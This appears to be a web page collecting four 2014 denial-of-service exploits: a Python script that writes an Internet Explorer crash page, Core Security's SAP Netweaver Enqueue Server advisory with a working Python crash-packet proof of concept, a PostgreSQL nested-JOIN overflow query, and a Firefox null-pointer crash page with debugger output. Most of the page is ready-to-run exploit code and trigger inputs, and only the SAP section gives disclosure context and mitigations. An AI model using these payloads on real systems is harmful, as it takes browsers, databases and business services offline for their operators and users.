Last Denial of Service Exploits

Internet Explorer 11 – Denial Of Service

# Exploit Title: [ IE D.O.S ]
# Date: [10/28/2014]
# Exploit Author: [Behrooz Abbassi]
# Vendor Homepage: [http://microsoft.com]
# Software Link: [http://windows.microsoft.com/en-us/internet-explorer/download-ie]
# Version: [tested on 8 to 11]
# Tested on: [XP to 8.1 x64/x86]

FuckIE="""<!DOCTYPE html>\n<html>\n<head><title>IE D.O.S</title>\n</head>\n<body>\n %s </body>\n</html>\n"""

rubbish  = """  <div class="First"><div class="Two"/> :-)<div class="Three"> </div>\n""" * 1021

IE_DOS =FuckIE %rubbish

file = open("IE_DOS.html", "w")
file.write(IE_DOS)
file.close()

 SAP Netweaver Enqueue Server – Denial of Service
SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability

1. **Advisory Information**

Title: SAP Netweaver Enqueue Server Trace Pattern Denial of Service
Vulnerability
Advisory ID: CORE-2014-0007
Advisory URL:
http://www.coresecurity.com/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
Date published: 2014-10-15
Date of last update: 2014-10-15
Vendors contacted: SAP
Release mode: Coordinated release

2. **Vulnerability Information***
*
Class: Uncontrolled Recursion [CWE-674]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0995

3. **Vulnerability Description**

SAP Netweaver [1] is a technology platform for building and
integrating SAP business
applications. A vulnerability has been found in SAP Netweaver
that could allow an
unauthenticated, remote attacker to create denial of service
conditions. The vulnerability
is triggered by sending a specially crafted SAP Enqueue Server
packet to remote TCP port 32NN
(NN being the SAP system number) of a host running the
“Standalone Enqueue Server” service, part
of SAP Netweaver Application Server ABAP/Java. The “Standalone
Enqueue Server” is a critical
component of a SAP Netweaver installation in terms of
availability, rendering the whole SAP
system unresponsive.

4. **Vulnerable Packages**

. SAP Netweaver 7.01 (enserver.exe version v7010.32.15.63503).
. SAP Netweaver 7.20 (enserver.exe version v7200.70.18.23869).

Other versions are probably affected too, but they were not checked.

5. **Vendor Information, Solutions and Workarounds**

Martin Gallo proposed the following actions to mitigate the
impact of the vulnerabilities:

Restrict access to the Standalone Enqueue service by configuring
Access Control Lists [4] and to
the Standalone Enqueue Service TCP port 32XX (XX is the instance
number).

SAP published a security note [3] with the fix.

6. **Credits**

This vulnerability was discovered and researched by Martin Gallo
from Core Security Consulting
Services. The publication of this advisory was coordinated by
Joaquín Rodríguez Varela from Core
Advisories Team.

7. **Technical Description / Proof of Concept Code**

When the trace level of the service is configured to stop logging
when a pattern is found [2], the
service does not properly control the amount of recursion
resulting in a stack overflow exception.
The vulnerability can be triggered remotely by setting the trace
level with a wildcard Trace Pattern.
This vulnerability could allow a remote, unauthenticated attacker
to conduct a denial of service
attack against the vulnerable systems, rendering the Enqueue
Server unavailable.

The following python code can be used to trigger the vulnerability:

7.1. **Proof of Concept**

/-----
import socket, struct
from optparse import OptionParser
 
# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",
default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port
number", default=3200)
(options, args) = parser.parse_args()
 
def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)
 
# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))
 
print "[*] Sending crash packet"
 
crash = '\xab\xcd\xe1\x23'  # Magic bytes
crash+= '\x00\x00\x00\x00'  # Id
crash+= '\x00\x00\x00\x5b\x00\x00\x00\x5b'  # Packet/frag length
crash+= '\x03\x00\x00\x00'  # Destination/Opcode/MoreFrags/Type
crash+= 'ENC\x00'  # Admin Eye-catcher
crash+= '\x01\x00\x00\x00'  # Version
crash+= '#EAA'  # Admin Eye-catcher
crash+= '\x01\x00\x00\x00\x00'  # Len
crash+= '\x06\x00\x00\x00\x00\x00'  # Opcode/Flags/RC
crash+= '#EAE'  # Admin Eye-catcher
crash+= '\x01\x04\x00\x00'  # Version/Action/Limit/Tread
crash+= '\x00\x00\x00\x00'
crash+= '\x00\x00\x00\x03\x00\x00\x00\x03'  # Trace Level
crash+= '\x01'  # Logging
crash+= '\x01\x40\x00\x00'  # Max file size
crash+= '\x00\x00\x00\x01\x00\x00\x00\x01'  # No. patterns
crash+= '\x00\x00\x00\x25#EAH'  # Trace Eye-catcher
crash+= '\x01*\x00'  # Trace Pattern
crash+= '#EAD'  # Trace Eye-catcher
 
send_packet(connection, crash)
print "[*] Crash sent !"
-----/

 

8. **Report Timeline**

. 2014-06-02:

Initial notification sent to SAP, including technical
description to reproduce the
vulnerability. Publication date set to Jun 30, 2014.

. 2014-06-03:

Vendor notifies that the tracking number 1153917-2014 was
created for this issue.

. 2014-06-26:

Core Security requests SAP to inform the status of the advisory.

. 2014-06-30:

The vendor informs they were not able to reproduce the issue and
they request additional
details and a proof of concept.

. 2014-06-30:

Core Security sends SAP a full description of the vulnerability
including a python script
to trigger it.

. 2014-07-11:

Core Security asks if the vendor was able to trigger the
vulnerability. Additinally we
requested to set a publication date for the advisory based on
the release of a fix.

. 2014-07-14:

The vendor informs they were able to reproduce the issue but
they will not be able to provide
a timeline for the fix at the time. They inform they will work
with high priority on it and
will inform us of the planned fix release date.

. 2014-08-12:

Core Security asks if the vendor was able to develop a fix and
if they have a possible timeline
for its availability.

. 2014-08-13:

The vendor informs that the fix is undergoing quality checks.
They also inform that they can’t
provide an exact date of publication yet. They also request a 3
months grace period once the
patch is available.

. 2014-08-13:

Core Security informs SAP that after we get notice that the fix
is available to the public we will
publish the advisory accordingly and will not wait for the 3
months of grace as requested because
that’s not our proceeding policy.

. 2014-08-18:

The vendor informs that the fix is going to be released with the
October patch day, on Tuesday the
14th, of 2014.

. 2014-10-14:

The vendor publishes the fix under the security note 2042845.

. 2014-10-15:

Core Security releases the advisory.

9. **References**

[1] http://www.sap.com/platform/netweaver/index.epx.
[2]
http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm
[3] SAP security note 2042845
[4] https://websmp230.sap-ag.de/sap/support/notes/1495075.

10. **About CoreLabs**

CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security
technologies.
We conduct our research in several important areas of computer
security
including system vulnerabilities, cyber attack planning and
simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel
solutions and
prototypes for new technologies. CoreLabs regularly publishes
security
advisories, technical papers, project information and shared
software
tools for public use at: http://corelabs.coresecurity.com.

11. **About Core Security**

Core Security enables organizations to get ahead of threats with
security
test and measurement solutions that continuously identify and
demonstrate
real-world exposures to their most critical assets. Our
customers can
gain real visibility into their security standing, real
validation of
their security controls, and real metrics to more effectively
secure their
organizations.

Core Security’s software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company’s
Security
Consulting Services, CoreLabs and Engineering groups. Core Security
can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.

12. **Disclaimer**

The contents of this advisory are copyright (c) 2014 Core
Security and (c) 2014 CoreLabs, and
are licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. **PGP/GPG Keys**

This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at

PostgreSQL <= 8.4.1 JOIN Hashtable Size Integer Overflow Denial Of Service Vulnerability

PostgreSQL is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data before using it in memory-allocation calculations.

An attacker can exploit this issue to cause the affected application to crash. Due to the nature of this issue, remote code execution may be possible; this has not been confirmed.

SELECT * from B AS alias0 LEFT JOIN BB AS alias1 LEFT JOIN B
AS alias2 LEFT JOIN A AS alias3 LEFT JOIN AA AS alias4 LEFT JOIN B
AS alias5 ON alias4.int_key = alias5.int_key ON alias3.int_key =
alias4.int_key LEFT JOIN AA AS alias6 LEFT JOIN A AS alias7 ON
alias6.int_key = alias7.int_key LEFT JOIN BB AS alias8 ON alias7.int_key
= alias8.int_key ON alias3.int_key = alias8.int_key LEFT JOIN AA AS
alias9 ON alias6.int_key = alias9.int_key ON alias2.int_key =
alias8.int_key LEFT JOIN BB AS alias10 LEFT JOIN AA AS alias11 LEFT
JOIN B AS alias12 ON alias11.int_key = alias12.int_key ON alias10.int_key
= alias11.int_key ON alias9.int_key = alias10.int_key ON alias1.int_key =
alias8.int_key LEFT JOIN BB AS alias13 LEFT JOIN A AS alias14
LEFT JOIN AA AS alias15 LEFT JOIN A AS alias16 ON alias15.int_key =
alias16.int_key LEFT JOIN B AS alias17 ON alias15.int_key =
alias17.int_key ON alias14.int_key = alias16.int_key LEFT JOIN AA AS
alias18 ON alias14.int_key = alias18.int_key LEFT JOIN B AS alias19 ON
alias15.int_key = alias19.int_key LEFT JOIN AA AS alias20 ON
alias16.int_key = alias20.int_key ON alias13.int_key = alias19.int_key
LEFT JOIN A AS alias21 ON alias13.int_key = alias21.int_key ON
alias3.int_key = alias17.int_key LEFT JOIN B AS alias22 ON alias7.int_key
= alias22.int_key LEFT JOIN A AS alias23 ON alias20.int_key =
alias23.int_key LEFT JOIN A AS alias24 ON alias14.int_key =
alias24.int_key LEFT JOIN BB AS alias25 LEFT JOIN BB AS alias26 ON
alias25.int_key = alias26.int_key LEFT JOIN A AS alias27 LEFT JOIN
A AS alias28 ON alias27.int_key = alias28.int_key LEFT JOIN B AS alias29
LEFT JOIN BB AS alias30 LEFT JOIN B AS alias31 LEFT JOIN A AS
alias32 LEFT JOIN B AS alias33 ON alias32.int_key = alias33.int_key LEFT
JOIN A AS alias34 ON alias32.int_key = alias34.int_key ON alias31.int_key
= alias33.int_key ON alias30.int_key = alias33.int_key ON alias29.int_key
= alias34.int_key ON alias27.int_key = alias34.int_key LEFT JOIN AA AS
alias35 LEFT JOIN A AS alias36 ON alias35.int_key = alias36.int_key ON
alias34.int_key = alias36.int_key LEFT JOIN A AS alias37 ON
alias33.int_key = alias37.int_key ON alias25.int_key = alias32.int_key
LEFT JOIN A AS alias38 ON alias37.int_key = alias38.int_key ON
alias15.int_key = alias37.int_key ON alias0.int_key = alias9.int_key

Mozilla Firefox 29.0 – Null Pointer Dereference Vulnerability

<html>
<title>Mozilla Firefox Null Pointer Dereference Vulnerability</title>
<pre>
Fun side of life!
<br>
Details:
    Title: Mozilla Firefox Null Pointer Dereference Vulnerability
    Version: Prior to 29.0
    Date: 4/30/2014
    Discovered By: Mr.XHat
    E-Mail: Mr.XHat {AT} GMail.com
    Tested On: Windows 7 x64 EN
###################################
Disassembly:
    01694240 8bc2            mov     eax,edx
    01694242 d9e0            fchs
    01694244 8b550c          mov     edx,dword ptr [ebp+0Ch]
    01694247 d95c2418        fstp    dword ptr [esp+18h]
    0169424b 8b1a            mov     ebx,dword ptr [edx]  ds:0023:00000000=????????
    0169424d d9442418        fld     dword ptr [esp+18h]
    01694251 8d4c2420        lea     ecx,[esp+20h]
    01694255 d9c0            fld     st(0)
    01694257 51              push    ecx
============================================
Output:
    (e0.544): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=07e1fd00 ebx=0994bf90 ecx=000001f8 edx=00000000 esi=000000a8 edi=00000000
    eip=0169424b esp=0012c8f0 ebp=0012c940 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mozilla Firefox\xul.dll - 
    xul!NS_NewLocalFile+0x2a49c:
    0169424b 8b1a            mov     ebx,dword ptr [edx]  ds:0023:00000000=????????
#######################################################################################
</pre>
<a href="javascript:_Launch_Website_In_Floating_Window_()"
onclick="window.open('about:blank','1','toolbar=yes,location=yes,directories=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=9999999999,height=9999999999');"
>Crash_Me</a>
<br><br>
I kill you again!
</html>

Leave a Reply

Your email address will not be published. Required fields are marked *